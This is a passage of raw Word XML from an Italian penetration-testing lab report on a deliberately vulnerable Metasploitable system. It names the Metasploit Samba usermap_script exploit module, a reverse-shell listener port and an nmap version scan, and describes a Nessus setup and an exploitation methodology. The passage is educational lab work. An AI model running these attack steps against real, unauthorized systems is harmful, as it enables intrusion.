          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003D">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Framework di exploitation</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit Framework (msfconsole)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Modulo Metasploit impiegato</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000040">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">exploit/multi/samba/usermap_script</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000041">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Porta del listener (LPORT)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000042">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">5555/tcp</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La componente Nessus è stata preventivamente installata sul sistema Kali Linux mediante pacchetto Debian ufficiale (Nessus-10.8.2-debian10_amd64.deb), attivata tramite la licenza gratuita "Nessus Essentials" e configurata attraverso l'interfaccia web raggiungibile all'indirizzo https://localhost:8834, previo download dei relativi plugin di rilevamento.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Metodologia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'attività è stata strutturata secondo un approccio metodologico articolato in fasi sequenziali, coerente con le prassi standard del penetration testing, in particolare con le fasi di Information Gathering, Vulnerability Assessment, Exploitation e Post-Exploitation previste dai principali framework metodologici di settore (es. PTES — Penetration Testing Execution Standard):</w:t>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Fase 1 — Ricognizione e Vulnerability Assessment: identificazione dei servizi esposti dal sistema target mediante scansione delle porte (nmap) e successiva scansione di vulnerabilità mediante Nessus.</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Fase 2 — Sfruttamento (Exploitation): individuazione e configurazione del modulo Metasploit corrispondente alla vulnerabilità identificata, e conseguente esecuzione dell'exploit.</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Fase 3 — Verifica e Post-Exploitation: conferma dell'accesso ottenuto mediante l'esecuzione di comandi di enumerazione nella shell remota conseguita.</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Fase 4 — Analisi dei risultati e formulazione delle contromisure.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5. Fase 1 — Ricognizione e Vulnerability Assessment</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.1 Ricognizione della superficie d'attacco mediante Nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Quale attività preliminare alla scansione di vulnerabilità, è stata eseguita una ricognizione dei servizi esposti dal sistema target mediante lo strumento Nmap, con rilevamento delle versioni dei servizi attivi (-sV):</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:left w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:bottom w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
          <w:right w:color="bfbfbf" w:space="0" w:sz="4" w:val="single"/>
        </w:pBdr>
        <w:shd w:fill="f2f2f2" w:val="clear"/>
        <w:spacing w:after="240" w:before="120" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1f1f1f"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap -sV 192.168.50.150</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">L'esito della scansione ha evidenziato un numero considerevole di servizi di rete attivi ed esposti, tra cui, in particolare, il servizio Samba (netbios-ssn) in ascolto sulle porte 139/tcp e 445/tcp, oltre a numerosi altri servizi storicamente associati a vulnerabilità note (FTP vsftpd 2.3.4, Telnet, RPC, NFS, MySQL, PostgreSQL, VNC, Apache Tomcat/Coyote). Tale ampia superficie d'attacco è coerente con la natura didattica del sistema Metasploitable, appositamente configurato con servizi obsoleti e vulnerabili a fini formativi.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004F">
      <w:pPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="0" distT="0" distL="0" distR="0">
            <wp:extent cx="5207000" cy="2512695"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4"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5207000" cy="2512695"/>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spacing w:after="300" w:before="100" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Figura 1 – </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:color w:val="595959"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Output del comando nmap -sV 192.168.50.150: enumerazione dei servizi di rete esposti dal sistema target, con evidenza del servizio Samba (netbios-ssn) sulle porte 139/tcp e 445/tcp.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="160" w:before="280" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="1f3864"/>
          <w:sz w:val="25"/>
          <w:szCs w:val="25"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2 Esecuzione della scansione di vulnerabilità con Nessus</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:spacing w:after="200" w:line="300" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Successivamente alla fase di ricognizione, è stata configurata ed eseguita, tramite l'interfaccia web di Nessus, una scansione di tipo "Basic Network Scan" nei confronti del sistema target, secondo i parametri riportati nella tabella seguente.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="8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5300"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3200"/>
            <w:gridCol w:w="5300"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Parametro di scansione</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="1f3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Valore</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Nome scansione</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Meta (Metasploitable_Scan)</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Tipologia di policy</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ffffff" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
              <w:bottom w:w="100.0" w:type="dxa"/>
              <w:right w:w="150.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="1f1f1f"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Basic Network Scan</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="ededed" w:val="clear"/>
            <w:tcMar>
              <w:top w:w="100.0" w:type="dxa"/>
              <w:left w:w="150.0" w:type="dxa"/>
